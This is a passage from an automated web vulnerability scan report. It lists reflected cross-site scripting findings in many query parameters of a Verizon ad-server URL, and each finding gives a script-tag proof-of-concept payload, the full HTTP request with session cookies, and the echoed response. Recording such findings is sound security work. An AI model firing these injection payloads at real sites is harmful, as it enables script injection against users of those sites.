Date: Sat, 20 Nov 2010 02:13:05 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Cteonnt-Length: 1394
Content-Type: text/html
Cache-Control: private
Content-Length: 1394

<script type='text/javascript'>
var ACE_AR = {site: '737081', size: '728090'};
</script>
<script type='text/javascript' SRC='http://uac.advertising.com/wrapper/aceUAC.js'></script>
<a href="http:/
...[SNIP]...
p/VDSL/PlatformA_vzsur_728_2009-05/PlatformA_vzsur_728_2009-05_tracking/726e6f58326b7a6e4b45494141693565?popip=174.122.23.218&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=46b4c"><script>alert(1)</script>f168f1782af&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&
...[SNIP]...

3.27. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top [popstate parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://oascentral.verizononline.com
Path:   /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top

Issue detail

The value of the popstate request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 67eb7"><script>alert(1)</script>25f6305b55d was submitted in the popstate parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top?popip=174.122.23.218&popindicator=&popcity=&popstate=67eb7"><script>alert(1)</script>25f6305b55d&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search= HTTP/1.1
Host: oascentral.verizononline.com
Proxy-Connection: keep-alive
Referer: http://surround.verizon.net/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rnoX2kznKEIAAi5e; RMFW=011PJcWI710es7jT; NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660; RMFD=011PJccjO10erias

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 02:12:57 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Cteonnt-Length: 1396
Content-Type: text/html
Cache-Control: private
Content-Length: 1396

<script type='text/javascript'>
var ACE_AR = {site: '737081', size: '728090'};
</script>
<script type='text/javascript' SRC='http://uac.advertising.com/wrapper/aceUAC.js'></script>
<a href="http:/
...[SNIP]...
/vzsurround2.net/homepage/L24/1707385016/Top/VDSL/PlatformA_vzsur_728_2009-05/PlatformA_vzsur_728_2009-05_tracking/726e6f58326b7a6e4b45494141693565?popip=174.122.23.218&popindicator=&popcity=&popstate=67eb7"><script>alert(1)</script>25f6305b55d&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&
...[SNIP]...

3.28. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top [popzipcode parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://oascentral.verizononline.com
Path:   /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top

Issue detail

The value of the popzipcode request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a9011"><script>alert(1)</script>883683fd3b3 was submitted in the popzipcode parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top?popip=174.122.23.218&popindicator=&popcity=&popstate=&popzipcode=a9011"><script>alert(1)</script>883683fd3b3&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search= HTTP/1.1
Host: oascentral.verizononline.com
Proxy-Connection: keep-alive
Referer: http://surround.verizon.net/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rnoX2kznKEIAAi5e; RMFW=011PJcWI710es7jT; NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660; RMFD=011PJccjO10erias

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 02:12:59 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Cteonnt-Length: 1396
Content-Type: text/html
Cache-Control: private
Content-Length: 1396

<script type='text/javascript'>
var ACE_AR = {site: '737081', size: '728090'};
</script>
<script type='text/javascript' SRC='http://uac.advertising.com/wrapper/aceUAC.js'></script>
<a href="http:/
...[SNIP]...
.net/homepage/L24/1213504191/Top/VDSL/PlatformA_vzsur_728_2009-05/PlatformA_vzsur_728_2009-05_tracking/726e6f58326b7a6e4b45494141693565?popip=174.122.23.218&popindicator=&popcity=&popstate=&popzipcode=a9011"><script>alert(1)</script>883683fd3b3&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail
...[SNIP]...

3.29. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top [prizm parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://oascentral.verizononline.com
Path:   /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top

Issue detail

The value of the prizm request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 69473"><script>alert(1)</script>59a6c993841 was submitted in the prizm parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top?popip=174.122.23.218&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=69473"><script>alert(1)</script>59a6c993841&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search= HTTP/1.1
Host: oascentral.verizononline.com
Proxy-Connection: keep-alive
Referer: http://surround.verizon.net/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rnoX2kznKEIAAi5e; RMFW=011PJcWI710es7jT; NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660; RMFD=011PJccjO10erias

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 02:13:10 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Cteonnt-Length: 1396
Content-Type: text/html
Cache-Control: private
Content-Length: 1396

<script type='text/javascript'>
var ACE_AR = {site: '737081', size: '728090'};
</script>
<script type='text/javascript' SRC='http://uac.advertising.com/wrapper/aceUAC.js'></script>
<a href="http:/
...[SNIP]...
A_vzsur_728_2009-05/PlatformA_vzsur_728_2009-05_tracking/726e6f58326b7a6e4b45494141693565?popip=174.122.23.218&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=69473"><script>alert(1)</script>59a6c993841&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&we
...[SNIP]...

3.30. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top [pts parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://oascentral.verizononline.com
Path:   /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top

Issue detail

The value of the pts request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9bff5"><script>alert(1)</script>2291f6d753d was submitted in the pts parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top?popip=174.122.23.218&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=9bff5"><script>alert(1)</script>2291f6d753d&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search= HTTP/1.1
Host: oascentral.verizononline.com
Proxy-Connection: keep-alive
Referer: http://surround.verizon.net/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rnoX2kznKEIAAi5e; RMFW=011PJcWI710es7jT; NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660; RMFD=011PJccjO10erias

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 02:13:43 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Cteonnt-Length: 1396
Content-Type: text/html
Cache-Control: private
Content-Length: 1396

<script type='text/javascript'>
var ACE_AR = {site: '737081', size: '728090'};
</script>
<script type='text/javascript' SRC='http://uac.advertising.com/wrapper/aceUAC.js'></script>
<a href="http:/
...[SNIP]...
ndicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=9bff5"><script>alert(1)</script>2291f6d753d&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search=" target="_top">
...[SNIP]...

3.31. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top [pws parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://oascentral.verizononline.com
Path:   /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top

Issue detail

The value of the pws request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2c02f"><script>alert(1)</script>7422fc85b1a was submitted in the pws parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top?popip=174.122.23.218&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=2c02f"><script>alert(1)</script>7422fc85b1a&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search= HTTP/1.1
Host: oascentral.verizononline.com
Proxy-Connection: keep-alive
Referer: http://surround.verizon.net/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rnoX2kznKEIAAi5e; RMFW=011PJcWI710es7jT; NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660; RMFD=011PJccjO10erias

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 02:13:30 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Cteonnt-Length: 1394
Content-Type: text/html
Cache-Control: private
Content-Length: 1394

<script type='text/javascript'>
var ACE_AR = {site: '737081', size: '728090'};
</script>
<script type='text/javascript' SRC='http://uac.advertising.com/wrapper/aceUAC.js'></script>
<a href="http:/
...[SNIP]...
a6e4b45494141693565?popip=174.122.23.218&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=2c02f"><script>alert(1)</script>7422fc85b1a&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search=" target="_top">
...[SNIP]...

3.32. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top [search parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://oascentral.verizononline.com
Path:   /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top

Issue detail

The value of the search request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e4daa"><script>alert(1)</script>d5404341735 was submitted in the search parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top?popip=174.122.23.218&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search=e4daa"><script>alert(1)</script>d5404341735 HTTP/1.1
Host: oascentral.verizononline.com
Proxy-Connection: keep-alive
Referer: http://surround.verizon.net/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rnoX2kznKEIAAi5e; RMFW=011PJcWI710es7jT; NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660; RMFD=011PJccjO10erias

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 02:14:05 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Cteonnt-Length: 1396
Content-Type: text/html
Cache-Control: private
Content-Length: 1396

<script type='text/javascript'>
var ACE_AR = {site: '737081', size: '728090'};
</script>
<script type='text/javascript' SRC='http://uac.advertising.com/wrapper/aceUAC.js'></script>
<a href="http:/
...[SNIP]...
artner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search=e4daa"><script>alert(1)</script>d5404341735" target="_top">
...[SNIP]...

3.33. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top [sec_email parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://oascentral.verizononline.com
Path:   /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top

Issue detail

The value of the sec_email request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 577c7"><script>alert(1)</script>7bd9773acc was submitted in the sec_email parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top?popip=174.122.23.218&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=577c7"><script>alert(1)</script>7bd9773acc&webhosting=&bbaw=&smb_enh_msg=&webex=&search= HTTP/1.1
Host: oascentral.verizononline.com
Proxy-Connection: keep-alive
Referer: http://surround.verizon.net/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rnoX2kznKEIAAi5e; RMFW=011PJcWI710es7jT; NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660; RMFD=011PJccjO10erias

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 02:13:53 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Cteonnt-Length: 1394
Content-Type: text/html
Cache-Control: private
Content-Length: 1394

<script type='text/javascript'>
var ACE_AR = {site: '737081', size: '728090'};
</script>
<script type='text/javascript' SRC='http://uac.advertising.com/wrapper/aceUAC.js'></script>
<a href="http:/
...[SNIP]...
popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=577c7"><script>alert(1)</script>7bd9773acc&webhosting=&bbaw=&smb_enh_msg=&webex=&search=" target="_top">
...[SNIP]...

3.34. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top [smb_enh_msg parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://oascentral.verizononline.com
Path:   /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top

Issue detail

The value of the smb_enh_msg request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ec203"><script>alert(1)</script>f54ed3ebb44 was submitted in the smb_enh_msg parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top?popip=174.122.23.218&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=ec203"><script>alert(1)</script>f54ed3ebb44&webex=&search= HTTP/1.1
Host: oascentral.verizononline.com
Proxy-Connection: keep-alive
Referer: http://surround.verizon.net/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rnoX2kznKEIAAi5e; RMFW=011PJcWI710es7jT; NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660; RMFD=011PJccjO10erias

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 02:14:01 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Cteonnt-Length: 1394
Content-Type: text/html
Cache-Control: private
Content-Length: 1394

<script type='text/javascript'>
var ACE_AR = {site: '737081', size: '728090'};
</script>
<script type='text/javascript' SRC='http://uac.advertising.com/wrapper/aceUAC.js'></script>
<a href="http:/
...[SNIP]...
zm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=ec203"><script>alert(1)</script>f54ed3ebb44&webex=&search=" target="_top">
...[SNIP]...

3.35. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top [smb_premmail parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://oascentral.verizononline.com
Path:   /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top

Issue detail

The value of the smb_premmail request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7dcbc"><script>alert(1)</script>588a49e61fd was submitted in the smb_premmail parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top?popip=174.122.23.218&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=7dcbc"><script>alert(1)</script>588a49e61fd&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search= HTTP/1.1
Host: oascentral.verizononline.com
Proxy-Connection: keep-alive
Referer: http://surround.verizon.net/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rnoX2kznKEIAAi5e; RMFW=011PJcWI710es7jT; NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660; RMFD=011PJccjO10erias

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 02:13:50 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Cteonnt-Length: 1394
Content-Type: text/html
Cache-Control: private
Content-Length: 1394

<script type='text/javascript'>
var ACE_AR = {site: '737081', size: '728090'};
</script>
<script type='text/javascript' SRC='http://uac.advertising.com/wrapper/aceUAC.js'></script>
<a href="http:/
...[SNIP]...
popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=7dcbc"><script>alert(1)</script>588a49e61fd&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search=" target="_top">
...[SNIP]...

3.36. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top [usertype parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://oascentral.verizononline.com
Path:   /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top

Issue detail

The value of the usertype request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e3855"><script>alert(1)</script>424effc9656 was submitted in the usertype parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top?popip=174.122.23.218&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=e3855"><script>alert(1)</script>424effc9656&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search= HTTP/1.1
Host: oascentral.verizononline.com
Proxy-Connection: keep-alive
Referer: http://surround.verizon.net/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rnoX2kznKEIAAi5e; RMFW=011PJcWI710es7jT; NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660; RMFD=011PJccjO10erias

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 02:13:12 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Cteonnt-Length: 1394
Content-Type: text/html
Cache-Control: private
Content-Length: 1394

<script type='text/javascript'>
var ACE_AR = {site: '737081', size: '728090'};
</script>
<script type='text/javascript' SRC='http://uac.advertising.com/wrapper/aceUAC.js'></script>
<a href="http:/
...[SNIP]...
8_2009-05/PlatformA_vzsur_728_2009-05_tracking/726e6f58326b7a6e4b45494141693565?popip=174.122.23.218&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=e3855"><script>alert(1)</script>424effc9656&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&searc
...[SNIP]...

3.37. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top [vasonly parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://oascentral.verizononline.com
Path:   /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top

Issue detail

The value of the vasonly request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 55b7c"><script>alert(1)</script>5aa14f10290 was submitted in the vasonly parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

